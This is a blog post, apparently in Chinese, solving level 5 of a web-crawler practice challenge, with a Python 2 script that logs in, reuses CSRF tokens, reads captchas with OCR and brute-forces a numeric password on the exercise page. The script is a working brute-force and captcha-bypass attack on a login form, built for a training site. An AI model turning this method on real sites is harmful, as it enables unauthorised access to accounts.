1. 程式人生 > >黑板客 -- 爬蟲闖關 -- 關卡05

黑板客 -- 爬蟲闖關 -- 關卡05

ref time pos download 模塊 pytho awl post dde

簡介


爬蟲闖關鏈接:


1. http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/

2. http://www.heibanke.com/lesson/crawler_ex04/

3. http://www.heibanke.com


知識點:cookie 與 session、CSRF、Web 編程、驗證碼識別模塊


提示:與前4題相比,本題的難點在於驗證碼識別。為了方便起見,這裡直接使用網絡上現成的pytesser模塊。在64位Python上安裝PIL模塊時可能會遇到一點小麻煩,建議盡量使用32位Python。


pytesser模塊安裝及使用參考資料:


1. http://blog.csdn.net/evankaka/article/details/49533493

2. http://blog.csdn.net/tianxiawuzhei/article/details/44922843

3. http://blog.csdn.net/bigzhao_25/article/details/52350781


參考代碼


#!/usr/bin/env python
# encoding: utf-8
 
import requests
import sys
import re
import threading
from pytesser import *  
 
# Python 2 only: reload(sys) makes sys.setdefaultencoding available again so
# the implicit str <-> unicode conversions performed elsewhere in this script
# use UTF-8 instead of ASCII.
reload(sys)
sys.setdefaultencoding("utf-8")

# Endpoints of the exercise site.
website_imageBase = "http://www.heibanke.com"
website_login = "http://www.heibanke.com/accounts/login/?next=/lesson/crawler_ex04/"
website_attack = "http://www.heibanke.com/lesson/crawler_ex04/"

# Account used for logging in, plus placeholders that are filled in at runtime.
username, password = "Peter", "112233"
csrf = captcha_0 = captcha_1 = attack_password = ""

# Form body for the login request.
payload_login = {
    "username": username,
    "password": password,
    "csrfmiddlewaretoken": csrf,
}

# Form body for a password guess; the password, token and captcha fields are
# overwritten before every request.
payload_attack = {
    "username": username,
    "password": attack_password,
    "csrfmiddlewaretoken": csrf,
    "captcha_0": captcha_0,
    "captcha_1": captcha_1,
}

# One shared session so cookies persist across requests. The initial GET is
# issued so that the cookie jar holds a "csrftoken" value, which is then
# copied into both form payloads.
s = requests.Session()
s.get(website_login)
csrf = s.cookies["csrftoken"]
payload_login["csrfmiddlewaretoken"] = csrf
payload_attack["csrfmiddlewaretoken"] = csrf
 
def Test_verCode(image_path):
    """Run OCR on the image stored at ``image_path`` and return the text.

    ``Image`` and ``image_to_string`` are expected to be provided by the
    ``from pytesser import *`` at the top of the file. The recognised text is
    returned exactly as the OCR call produced it (no trimming is done here).
    """
    return image_to_string(Image.open(image_path))
 
def getVerCode(resp):
    """Extract the captcha details from a page and return the image URL.

    ``resp`` is a response object whose ``content`` holds the page HTML.
    The value of the hidden ``captcha_0`` input is stored in
    ``payload_attack["captcha_0"]``; the ``src`` of the captcha ``<img>`` is
    appended to ``website_imageBase`` and returned.

    Raises IndexError when either element is missing from the page.
    """
    html = resp.content
    image_paths = re.findall('<img src="(.*?)" alt="captcha" class="captcha" />', html)
    captcha_keys = re.findall('<input id="id_captcha_0" name="captcha_0" type="hidden" value="(.*?)" />', html)
    # The hidden key is recorded before the image path is looked up.
    payload_attack["captcha_0"] = captcha_keys[0]
    return website_imageBase + image_paths[0]
 
def downloadImage(Image_URL):
    """Download the image at ``Image_URL`` and save it as ``1.png``.

    The request uses a 10 second timeout. If the connection fails, a message
    is printed and the function returns without touching ``1.png``; any
    previously saved file is left as it was. Other request errors propagate
    to the caller.
    """
    try:
        pic = requests.get(Image_URL, timeout=10)
    except requests.exceptions.ConnectionError:
        print('[-] Image can not download ')
        # Nothing was fetched: stop here instead of falling through to
        # ``pic.content`` with ``pic`` unbound, which raised NameError.
        return
    # ``with`` guarantees the file is closed even if the write fails.
    with open('1.png', 'wb') as fp:
        fp.write(pic.content)
 
def get_attackResp(verCode_res, attack_password, s):
    """Submit one password guess and return the server's response.

    ``verCode_res`` is the OCR text of the current captcha; only its first
    four characters are sent as ``captcha_1``. ``attack_password`` is the
    guess and ``s`` is the session used for the POST to ``website_attack``.

    After the request, the session's current ``csrftoken`` cookie is copied
    into both ``payload_login`` and ``payload_attack``.
    """
    payload_attack["password"] = attack_password
    payload_attack["captcha_1"] = verCode_res[:4]
    response = s.post(website_attack, data=payload_attack)
    token = s.cookies["csrftoken"]
    for form in (payload_login, payload_attack):
        form["csrfmiddlewaretoken"] = token
    return response
 
def _solve_new_captcha():
    """Request a fresh captcha through the login URL and return its OCR text."""
    # The captcha is parsed out of the response to the login POST.
    # NOTE(review): presumably that response is the exercise page reached via
    # the ?next= redirect -- confirm against the site.
    resp_login = s.post(website_login, data=payload_login)
    token = s.cookies["csrftoken"]
    payload_login["csrfmiddlewaretoken"] = token
    payload_attack["csrfmiddlewaretoken"] = token
    downloadImage(getVerCode(resp_login))
    return Test_verCode('1.png')


def main(max_password=30):
    """Brute-force the exercise password by trying 0..``max_password``.

    For every candidate the guess is posted together with the OCR result of
    the current captcha. While the response reports a captcha error, a new
    captcha is fetched and the same candidate is retried (there is no retry
    limit). The first response that contains no error marker is treated as
    success: the password and the page text are printed and the search stops.
    If every candidate is rejected, a "not found" message is printed.

    ``max_password`` is the largest candidate tried (inclusive); the default
    of 30 matches the range this script has always used.
    """
    # NOTE(review): the two marker strings below must match the site's
    # response text exactly (including Traditional vs. Simplified Chinese
    # characters) -- confirm against a real response.
    verCode_res = _solve_new_captcha()
    for candidate in range(max_password + 1):
        attempt = str(candidate)
        resp_attack = get_attackResp(verCode_res, attempt, s)
        # Decode once, explicitly, so the text comparisons do not depend on
        # the process-wide default encoding.
        page = resp_attack.content.decode('utf8')
        while u'驗證碼輸入錯誤' in page:
            print("[-]VerCode ERROR: PW:" + payload_attack["password"] + " -- VERCODE:" + verCode_res)
            verCode_res = _solve_new_captcha()
            resp_attack = get_attackResp(verCode_res, attempt, s)
            page = resp_attack.content.decode('utf8')
        if u'錯誤' not in page:
            print("[+]FOUND PASSWORD:" + payload_attack["password"])
            print("\nTEXT:\n" + page)
            break
    else:
        # Every candidate was rejected; say so instead of exiting silently.
        print("[-]PASSWORD NOT FOUND in range 0-" + str(max_password))


if __name__ == '__main__':
    main()

黑板客 -- 爬蟲闖關 -- 關卡05